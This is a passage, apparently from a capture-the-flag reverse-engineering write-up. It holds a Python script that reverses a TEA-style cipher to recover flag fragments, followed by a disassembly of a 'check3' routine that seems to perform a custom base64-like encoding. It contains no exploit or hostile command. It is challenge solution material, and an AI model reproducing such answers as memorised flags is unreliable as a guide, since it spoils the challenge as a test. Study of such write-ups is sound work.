<span class="hljs-built_in">v0</span>=v[<span class="hljs-number">0</span>]
<span class="hljs-built_in">v1</span>=v[<span class="hljs-number">1</span>]
delta=<span class="hljs-number">0x1337dead</span>
sum1=delta*num_rounds<span class="hljs-comment">;</span>

for i in range(<span class="hljs-number">0x20</span>):
        <span class="hljs-built_in">v1</span> -= (((<span class="hljs-built_in">v0</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v0</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v0</span>) ^ (sum1 + key[(sum1&gt;&gt;<span class="hljs-number">11</span>) &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v1</span> %= <span class="hljs-number">0x100000000</span>
        sum1 -= delta<span class="hljs-comment">;</span>
        sum1 %= <span class="hljs-number">0x100000000</span>
        <span class="hljs-built_in">v0</span> -= (((<span class="hljs-built_in">v1</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v1</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v1</span>) ^ (sum1 + key[sum1 &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v0</span> %= <span class="hljs-number">0x100000000</span>
print chr(<span class="hljs-built_in">v0</span>),chr(<span class="hljs-built_in">v1</span>)
flag1+=chr(<span class="hljs-built_in">v0</span>)
flag2+=chr(<span class="hljs-built_in">v1</span>)
v=[<span class="hljs-number">0x72b53cf1</span>,<span class="hljs-number">0xd47c0209</span>]
num_rounds=<span class="hljs-number">0x20</span>
<span class="hljs-built_in">v0</span>=v[<span class="hljs-number">0</span>]
<span class="hljs-built_in">v1</span>=v[<span class="hljs-number">1</span>]
delta=<span class="hljs-number">0x1337dead</span>
sum1=delta*num_rounds<span class="hljs-comment">;</span>

for i in range(<span class="hljs-number">0x20</span>):
        <span class="hljs-built_in">v1</span> -= (((<span class="hljs-built_in">v0</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v0</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v0</span>) ^ (sum1 + key[(sum1&gt;&gt;<span class="hljs-number">11</span>) &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v1</span> %= <span class="hljs-number">0x100000000</span>
        sum1 -= delta<span class="hljs-comment">;</span>
        sum1 %= <span class="hljs-number">0x100000000</span>
        <span class="hljs-built_in">v0</span> -= (((<span class="hljs-built_in">v1</span> &lt;&lt; <span class="hljs-number">4</span>) ^ (<span class="hljs-built_in">v1</span> &gt;&gt; <span class="hljs-number">5</span>)) + <span class="hljs-built_in">v1</span>) ^ (sum1 + key[sum1 &amp; <span class="hljs-number">3</span>])<span class="hljs-comment">;</span>
        <span class="hljs-built_in">v0</span> %= <span class="hljs-number">0x100000000</span>
print chr(<span class="hljs-built_in">v0</span>),chr(<span class="hljs-built_in">v1</span>)
flag1+=chr(<span class="hljs-built_in">v0</span>)
flag2+=chr(<span class="hljs-built_in">v1</span>)


print flag1+flag2
<span class="hljs-comment"># _muCh_F0</span></code></pre><pre class="hljs"><code><span class="hljs-symbol">check3:</span>
   <span class="hljs-number">0</span>:   <span class="hljs-number">55</span>                      <span class="hljs-keyword">push</span>   <span class="hljs-built_in">rbp</span>
   <span class="hljs-number">1</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> e5                <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rbp</span>,<span class="hljs-built_in">rsp</span>
   <span class="hljs-number">4</span>:   <span class="hljs-number">48</span> <span class="hljs-number">81</span> ec e0 <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">sub</span>    <span class="hljs-built_in">rsp</span>,<span class="hljs-number">0xe0</span>
<span class="hljs-symbol">   b:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> bd <span class="hljs-number">28</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xd8</span>],<span class="hljs-built_in">rdi</span>
  <span class="hljs-number">12</span>:   <span class="hljs-number">89</span> b5 <span class="hljs-number">24</span> ff ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xdc</span>],<span class="hljs-built_in">esi</span>
  <span class="hljs-number">18</span>:   <span class="hljs-number">64</span> <span class="hljs-number">48</span> 8b <span class="hljs-number">04</span> <span class="hljs-number">25</span> <span class="hljs-number">28</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> <span class="hljs-built_in">fs</span>:<span class="hljs-number">0x28</span>
  1f:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
  <span class="hljs-number">21</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> f8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x8</span>],<span class="hljs-built_in">rax</span>
  <span class="hljs-number">25</span>:   <span class="hljs-number">31</span> c0                   <span class="hljs-keyword">xor</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">eax</span>
  <span class="hljs-number">27</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">85</span> <span class="hljs-number">70</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x90</span>],<span class="hljs-number">0x0</span>
  2e:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
  <span class="hljs-number">32</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">85</span> <span class="hljs-number">78</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x88</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">39</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
  <span class="hljs-number">3d</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> <span class="hljs-number">80</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x80</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">44</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">45</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> <span class="hljs-number">88</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x78</span>],<span class="hljs-number">0x0</span>
  4c:   <span class="hljs-number">00</span> 
  <span class="hljs-number">4d</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> <span class="hljs-number">90</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x70</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">54</span>:   <span class="hljs-number">00</span> 
  <span class="hljs-number">55</span>:   <span class="hljs-number">48</span> c7 <span class="hljs-number">45</span> <span class="hljs-number">98</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x68</span>],<span class="hljs-number">0x0</span>
  5c:   <span class="hljs-number">00</span> 
  <span class="hljs-number">5d</span>:   <span class="hljs-number">66</span> c7 <span class="hljs-number">45</span> a0 <span class="hljs-number">00</span> <span class="hljs-number">00</span>       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">WORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x60</span>],<span class="hljs-number">0x0</span>
  <span class="hljs-number">63</span>:   <span class="hljs-number">48</span> b8 2a 7c <span class="hljs-number">2d</span> <span class="hljs-number">49</span> <span class="hljs-number">66</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x32716e66492d7c2a</span>
  6a:   6e <span class="hljs-number">71</span> <span class="hljs-number">32</span> 
  <span class="hljs-number">6d</span>:   <span class="hljs-number">48</span> ba <span class="hljs-number">30</span> <span class="hljs-number">21</span> <span class="hljs-number">20</span> 0a <span class="hljs-number">41</span>    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x24645a410a202130</span>
  <span class="hljs-number">74</span>:   5a <span class="hljs-number">64</span> <span class="hljs-number">24</span> 
  <span class="hljs-number">77</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> b0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x50</span>],<span class="hljs-built_in">rax</span>
  7b:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">55</span> b8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x48</span>],<span class="hljs-built_in">rdx</span>
  7f:   <span class="hljs-number">48</span> b8 <span class="hljs-number">72</span> 3c <span class="hljs-number">58</span> 6f 5c    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x7b2f445c6f583c72</span>
  <span class="hljs-number">86</span>:   <span class="hljs-number">44</span> 2f 7b 
  <span class="hljs-number">89</span>:   <span class="hljs-number">48</span> ba 4b <span class="hljs-number">43</span> 7e <span class="hljs-number">61</span> <span class="hljs-number">34</span>    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x377a5434617e434b</span>
  <span class="hljs-number">90</span>:   <span class="hljs-number">54</span> 7a <span class="hljs-number">37</span> 
  <span class="hljs-number">93</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> c0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x40</span>],<span class="hljs-built_in">rax</span>
  <span class="hljs-number">97</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">55</span> c8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x38</span>],<span class="hljs-built_in">rdx</span>
  9b:   <span class="hljs-number">48</span> b8 <span class="hljs-number">29</span> <span class="hljs-number">59</span> 5e 3a <span class="hljs-number">78</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x7d0b60783a5e5929</span>
<span class="hljs-symbol">  a2:</span>   <span class="hljs-number">60</span> <span class="hljs-number">0b</span> <span class="hljs-number">7d</span> 
<span class="hljs-symbol">  a5:</span>   <span class="hljs-number">48</span> ba <span class="hljs-number">53</span> <span class="hljs-number">73</span> <span class="hljs-number">31</span> <span class="hljs-number">79</span> 4f    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x76696d4f79317353</span>
<span class="hljs-symbol">  ac:</span>   <span class="hljs-number">6d</span> <span class="hljs-number">69</span> <span class="hljs-number">76</span> 
<span class="hljs-symbol">  af:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> d0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x30</span>],<span class="hljs-built_in">rax</span>
<span class="hljs-symbol">  b3:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">55</span> d8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x28</span>],<span class="hljs-built_in">rdx</span>
<span class="hljs-symbol">  b7:</span>   <span class="hljs-number">48</span> b8 <span class="hljs-number">23</span> <span class="hljs-number">0d</span> <span class="hljs-number">25</span> <span class="hljs-number">5d</span> <span class="hljs-number">40</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x4e5f5b405d250d23</span>
<span class="hljs-symbol">  be:</span>   5b 5f 4e 
<span class="hljs-symbol">  c1:</span>   <span class="hljs-number">48</span> ba <span class="hljs-number">28</span> <span class="hljs-number">48</span> 6a 2c <span class="hljs-number">56</span>    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x677551562c6a4828</span>
<span class="hljs-symbol">  c8:</span>   <span class="hljs-number">51</span> <span class="hljs-number">75</span> <span class="hljs-number">67</span> 
<span class="hljs-symbol">  cb:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">45</span> e0             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x20</span>],<span class="hljs-built_in">rax</span>
<span class="hljs-symbol">  cf:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">55</span> e8             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x18</span>],<span class="hljs-built_in">rdx</span>
<span class="hljs-symbol">  d3:</span>   c6 <span class="hljs-number">45</span> f0 <span class="hljs-number">00</span>             <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x10</span>],<span class="hljs-number">0x0</span>
<span class="hljs-symbol">  d7:</span>   <span class="hljs-number">48</span> b8 <span class="hljs-number">34</span> <span class="hljs-number">60</span> <span class="hljs-number">51</span> <span class="hljs-number">25</span> <span class="hljs-number">41</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x23415f4125516034</span>
<span class="hljs-symbol">  de:</span>   5f <span class="hljs-number">41</span> <span class="hljs-number">23</span> 
<span class="hljs-symbol">  e1:</span>   <span class="hljs-number">48</span> ba <span class="hljs-number">54</span> 3a 5a <span class="hljs-number">25</span> <span class="hljs-number">41</span>    movabs <span class="hljs-built_in">rdx</span>,<span class="hljs-number">0x7d482f41255a3a54</span>
<span class="hljs-symbol">  e8:</span>   2f <span class="hljs-number">48</span> <span class="hljs-number">7d</span> 
<span class="hljs-symbol">  eb:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">50</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xb0</span>],<span class="hljs-built_in">rax</span>
<span class="hljs-symbol">  f2:</span>   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">95</span> <span class="hljs-number">58</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xa8</span>],<span class="hljs-built_in">rdx</span>
<span class="hljs-symbol">  f9:</span>   <span class="hljs-number">48</span> b8 7b <span class="hljs-number">25</span> <span class="hljs-number">6d</span> <span class="hljs-number">53</span> <span class="hljs-number">41</span>    movabs <span class="hljs-built_in">rax</span>,<span class="hljs-number">0xb515b41536d257b</span>
 <span class="hljs-number">100</span>:   5b <span class="hljs-number">51</span> <span class="hljs-number">0b</span> 
 <span class="hljs-number">103</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">60</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xa0</span>],<span class="hljs-built_in">rax</span>
 10a:   c6 <span class="hljs-number">85</span> <span class="hljs-number">68</span> ff ff ff <span class="hljs-number">00</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x98</span>],<span class="hljs-number">0x0</span>
 <span class="hljs-number">111</span>:   c7 <span class="hljs-number">85</span> <span class="hljs-number">30</span> ff ff ff <span class="hljs-number">01</span>    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xd0</span>],<span class="hljs-number">0x1</span>
 <span class="hljs-number">118</span>:   <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span> 
 <span class="hljs-number">11b</span>:   8b <span class="hljs-number">85</span> <span class="hljs-number">24</span> ff ff ff       <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">DWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xdc</span>]
 <span class="hljs-number">121</span>:   <span class="hljs-number">48</span> <span class="hljs-number">63</span> d0                <span class="hljs-keyword">movsxd</span> <span class="hljs-built_in">rdx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">124</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">28</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xd8</span>]
 12b:   <span class="hljs-number">48</span> <span class="hljs-number">01</span> d0                <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">rdx</span>
 12e:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">48</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xb8</span>],<span class="hljs-built_in">rax</span>
 <span class="hljs-number">135</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">28</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xd8</span>]
 13c:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>],<span class="hljs-built_in">rax</span>
 <span class="hljs-number">143</span>:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">85</span> <span class="hljs-number">70</span> ff ff ff    <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rax</span>,[<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0x90</span>]
 14a:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">85</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>],<span class="hljs-built_in">rax</span>
 <span class="hljs-number">151</span>:   e9 fa <span class="hljs-number">00</span> <span class="hljs-number">00</span> <span class="hljs-number">00</span>          <span class="hljs-keyword">jmp</span>    <span class="hljs-number">0x250</span>
 <span class="hljs-number">156</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 <span class="hljs-number">15d</span>:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 <span class="hljs-number">160</span>:   c0 e8 <span class="hljs-number">02</span>                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">al</span>,<span class="hljs-number">0x2</span>
 <span class="hljs-number">163</span>:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 <span class="hljs-number">166</span>:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 <span class="hljs-number">168</span>:   0f b6 4c <span class="hljs-number">05</span> b0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x50</span>]
 <span class="hljs-number">16d</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>]
 <span class="hljs-number">174</span>:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">50</span> <span class="hljs-number">01</span>             <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rdx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x1</span>]
 <span class="hljs-number">178</span>:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">95</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>],<span class="hljs-built_in">rdx</span>
 17f:   <span class="hljs-number">89</span> ca                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">ecx</span>
 <span class="hljs-number">181</span>:   <span class="hljs-number">88</span> <span class="hljs-number">10</span>                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>],<span class="hljs-built_in">dl</span>
 <span class="hljs-number">183</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 18a:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 <span class="hljs-number">18d</span>:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 <span class="hljs-number">190</span>:   c1 e0 <span class="hljs-number">04</span>                <span class="hljs-keyword">shl</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x4</span>
 <span class="hljs-number">193</span>:   <span class="hljs-number">83</span> e0 <span class="hljs-number">30</span>                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x30</span>
 <span class="hljs-number">196</span>:   <span class="hljs-number">89</span> c2                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
 <span class="hljs-number">198</span>:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 19f:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> c0 <span class="hljs-number">01</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x1</span>
 1a3:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 1a6:   c0 e8 <span class="hljs-number">04</span>                <span class="hljs-keyword">shr</span>    <span class="hljs-built_in">al</span>,<span class="hljs-number">0x4</span>
 1a9:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 1ac:   <span class="hljs-number">09</span> d0                   <span class="hljs-keyword">or</span>     <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">edx</span>
 1ae:   <span class="hljs-number">48</span> <span class="hljs-number">98</span>                   <span class="hljs-keyword">cdqe</span>   
 1b0:   0f b6 4c <span class="hljs-number">05</span> b0          <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">ecx</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>+<span class="hljs-built_in">rax</span>*<span class="hljs-number">1</span>-<span class="hljs-number">0x50</span>]
 1b5:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>]
 1bc:   <span class="hljs-number">48</span> <span class="hljs-number">8d</span> <span class="hljs-number">50</span> <span class="hljs-number">01</span>             <span class="hljs-keyword">lea</span>    <span class="hljs-built_in">rdx</span>,[<span class="hljs-built_in">rax</span>+<span class="hljs-number">0x1</span>]
 1c0:   <span class="hljs-number">48</span> <span class="hljs-number">89</span> <span class="hljs-number">95</span> <span class="hljs-number">38</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc8</span>],<span class="hljs-built_in">rdx</span>
 1c7:   <span class="hljs-number">89</span> ca                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">ecx</span>
 1c9:   <span class="hljs-number">88</span> <span class="hljs-number">10</span>                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>],<span class="hljs-built_in">dl</span>
 1cb:   <span class="hljs-number">48</span> 8b <span class="hljs-number">85</span> <span class="hljs-number">40</span> ff ff ff    <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-built_in">QWORD</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rbp</span>-<span class="hljs-number">0xc0</span>]
 1d2:   <span class="hljs-number">48</span> <span class="hljs-number">83</span> c0 <span class="hljs-number">01</span>             <span class="hljs-keyword">add</span>    <span class="hljs-built_in">rax</span>,<span class="hljs-number">0x1</span>
 1d6:   0f b6 <span class="hljs-number">00</span>                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">BYTE</span> <span class="hljs-built_in">PTR</span> [<span class="hljs-built_in">rax</span>]
 1d9:   0f b6 c0                <span class="hljs-keyword">movzx</span>  <span class="hljs-built_in">eax</span>,<span class="hljs-built_in">al</span>
 1dc:   c1 e0 <span class="hljs-number">02</span>                <span class="hljs-keyword">shl</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x2</span>
 1df:   <span class="hljs-number">83</span> e0 3c                <span class="hljs-keyword">and</span>    <span class="hljs-built_in">eax</span>,<span class="hljs-number">0x3c</span>
 1e2:   <span class="hljs-number">89</span> c2                   <span class="hljs-keyword">mov</span>    <span class="hljs-built_in">edx</span>,<span class="hljs-built_in">eax</span>
